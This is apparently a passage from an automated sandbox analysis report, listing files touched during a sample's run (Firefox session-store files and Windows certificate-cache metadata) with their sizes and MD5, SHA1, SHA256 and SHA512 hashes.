SHA512ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionCheckpoints.json
Filesize146B
MD565690c43c42921410ec8043e34f09079
SHA1362add4dbd0c978ae222a354a4e8d35563da14b4
SHA2567343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d
SHA512c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionCheckpoints.json.tmp
Filesize288B
MD5362985746d24dbb2b166089f30cd1bb7
SHA16520fc33381879a120165ede6a0f8aadf9013d3b
SHA256b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA5120e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionstore-backups\recovery.baklz4
Filesize2KB
MD5cb4d902a916d89b4d16a6eee7613e2f7
SHA1e8b4855785153ce334775be1cb7a7120e0e9ce16
SHA256b69f80f0f91b918bcde6eef86cd6fd783902b88a22625ad8defecfb39e08bb89
SHA512950820b40c0420f4d09628533e8287e823bfacbc48e92fdf4b966a3bf4897b2dbaf8a76970a340c773fc530397dd73196d609a84ffc520a8bbe8f4ebd60568d6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionstore-backups\recovery.baklz4
Filesize3KB
MD5c16daa10daa0cd01d77d9326a49703ad
SHA1574a3cca653f5b2b4cccc7000eca84d949c090d0
SHA2560d734c6983229fbe33be9e21cbd80b7b8f5c226889d547a772f7cd8852abbff3
SHA51202eeecce3b7db28f88e3c8ee157f9beea7c4e25c50939000b4454e5b9e7fe70ad9e1f78dfdb2d7bc7aa043f0fbd72ac345bca13b8c614d063890c558801ef3d0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\sessionstore-backups\recovery.baklz4
Filesize3KB
MD5d855b98060efc5c6f341785590895f69
SHA12d1991c29a3d2840e440f56c1f5efc6fe938c517
SHA256e9eaeb0a1474fba33f104331f37c5b9779fe148245a4fcffd528e692b0a24267
SHA51205da980df71d6aa19b8d01eecedf8e7a1c277d68653bfa34dbd5694588b03578a4108ab4a79ce60e0bc4f251f877b13bd80d787ea22cd642a9ab1e263e36f662
-
Filesize
138B
MD5771571a9505c6236a573cf59500657a3
SHA1baa73e3a9da1892934f60f156df82144b5356a00
SHA256d4cdbf94176bdf314eb0fd473ffce798bbd66abf485556b0bc62a026bbe23497
SHA512df9ee55aa8cb955fedf800132b86c3b65d1a45512825041857bce14210090d76f463f5fdca072f68061863b420ea2286b9033446bed6d3f8e8fce5eb263c0c79
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize328B
MD5e0a208f62ded8e2b4ba4887d59fa7455
SHA1e9dd7977a8b910d1393c422d02d5395c04bde0f3
SHA2568046b078c3005c0d11bab76e7558d4076df6b02d2c09d8ddf172e9fefbc2c622
SHA512bae0360bb9bbc84970b9354cee8be6dd71bd7bc2a59b09afb5ed679091ab15f05f63d1e669a759f4c35a8e1f2546b9db8617a3e5b4b2fcc46559ef65b4abc4c2
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5937b6b12992a32545c1985a7385c8fed
SHA10d6926f4e0fd0efe5a7713250367bfad1a8f6544
SHA256d9397e40f8d1d2c516c176e759ce97f67c9b89d21e715f764e3c8d2caf3f4f57
SHA5129a52e840f20dc96da2f656c655836f70cfbe3b7e390dfeeaa56caf161ffc5ae4e966fc174bab347733739043c3bf6356092f97fe0f88045499827b8ead27782e